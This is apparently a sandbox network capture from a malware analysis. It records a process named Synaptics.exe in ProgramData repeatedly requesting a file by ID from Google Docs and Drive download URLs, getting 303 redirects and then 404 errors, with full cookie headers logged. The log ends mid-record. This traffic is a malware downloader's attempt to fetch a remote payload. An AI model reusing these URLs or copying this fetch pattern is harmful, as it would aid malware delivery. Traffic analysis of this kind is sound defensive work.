2024-12-30 10:48:23 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="1iVSOOUawLYXIyrwNzpQfg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:48:23 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
55 | 192.168.2.7 | 50016 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:22 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=Fz-E11ZM6YjFGwBY8KCQ28eAwJauLQ9gLsUY7Y8z17km7g59imrP-l0rDAC1qgPXd_P4wphfP965G181-1iCoFlL0Tm12sJVd_xR6e52Py990_PjzF_LhukeQxYW1NdrSNRWqyGaCaYUxuGMH98UYJUWHJxAt1mkp0pu4rT7GriDqhHc6Z0SyPyT
2024-12-30 10:48:22 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:22 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-MABq3mFa2lxC1p2ZZ-cEgw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
56 | 192.168.2.7 | 50014 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:22 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=Fz-E11ZM6YjFGwBY8KCQ28eAwJauLQ9gLsUY7Y8z17km7g59imrP-l0rDAC1qgPXd_P4wphfP965G181-1iCoFlL0Tm12sJVd_xR6e52Py990_PjzF_LhukeQxYW1NdrSNRWqyGaCaYUxuGMH98UYJUWHJxAt1mkp0pu4rT7GriDqhHc6Z0SyPyT
2024-12-30 10:48:22 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:22 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-TYKuxfAXY1oy6oFgNfwtsg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                        57 | 192.168.2.7 | 50025 | 142.250.186.161 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                        2024-12-30 10:48:23 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:23 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC57s5J1nJCb35vBn4m1xPQBBL1wzk6KlKSRAB7caIZrZZJJCWeuwYe24DCOkMWLvEPqOaBVO9E
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:23 GMT
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-Nxh5i3nJ4tetKMuZ5T9-Bw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
                                                                                                                                                        2024-12-30 10:48:23 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                        2024-12-30 10:48:23 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="XnsQ0r36J5pDkLwTTcbvBw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                        2024-12-30 10:48:23 UTC | 122 | IN | Data Ascii: b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                        58 | 192.168.2.7 | 50026 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                        2024-12-30 10:48:23 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=Fz-E11ZM6YjFGwBY8KCQ28eAwJauLQ9gLsUY7Y8z17km7g59imrP-l0rDAC1qgPXd_P4wphfP965G181-1iCoFlL0Tm12sJVd_xR6e52Py990_PjzF_LhukeQxYW1NdrSNRWqyGaCaYUxuGMH98UYJUWHJxAt1mkp0pu4rT7GriDqhHc6Z0SyPyT
                                                                                                                                                        2024-12-30 10:48:23 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:23 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-YvS2lX-aKg7lx8jcXzkf-g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                        59 | 192.168.2.7 | 50027 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                        2024-12-30 10:48:23 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=Fz-E11ZM6YjFGwBY8KCQ28eAwJauLQ9gLsUY7Y8z17km7g59imrP-l0rDAC1qgPXd_P4wphfP965G181-1iCoFlL0Tm12sJVd_xR6e52Py990_PjzF_LhukeQxYW1NdrSNRWqyGaCaYUxuGMH98UYJUWHJxAt1mkp0pu4rT7GriDqhHc6Z0SyPyT
                                                                                                                                                        2024-12-30 10:48:24 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:23 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-LBvKSB0D57AzhDOTIpQL_A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                        60 | 192.168.2.7 | 50028 | 142.250.186.161 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                        2024-12-30 10:48:23 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:24 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC59Sdkyv2ux1gBeG63q0xc-WTy238cTxQUab6Z1Yjz6x15FkOUdNHk_3iqM1xkLBwOghMc_-08
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:24 GMT
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-DceZHgr2ScX6ZlEZnGgEtA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
                                                                                                                                                        2024-12-30 10:48:24 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                        2024-12-30 10:48:24 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="rcQBpnEy9vpt-Su_F33JzQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                        2024-12-30 10:48:24 UTC | 122 | IN | Data Ascii: b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                        61 | 192.168.2.7 | 50038 | 142.250.186.161 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                        2024-12-30 10:48:24 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
2024-12-30 10:48:25 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC4D-GG-RPf1eawJzoz9UdypHlaJREhrExNkmAj3txLz2p8dIWu2IY-E7haAGDNfF1YY
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:24 GMT
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-U5vZzP7wGK2O9taR9Pi_rQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
2024-12-30 10:48:25 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:48:25 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="NPuXlfLevZK8k1Wf2yqUTg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:48:25 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
62 | 192.168.2.7 | 50039 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:24 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
2024-12-30 10:48:25 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:24 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-dtB3mH6gVfZxiy7rpzZZiQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
63 | 192.168.2.7 | 50037 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:24 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
2024-12-30 10:48:25 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:24 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-e-Pznp9s6MlYbye9wuEc2A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
64 | 192.168.2.7 | 50041 | 142.250.186.161 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:24 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
2024-12-30 10:48:25 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC4iHpJ_FutwIKcUQSjSpPUTvSXHL81hvbkq4dBjDM8NZu_B5tOxBc1FBj5XjN2lCPMS
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:25 GMT
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
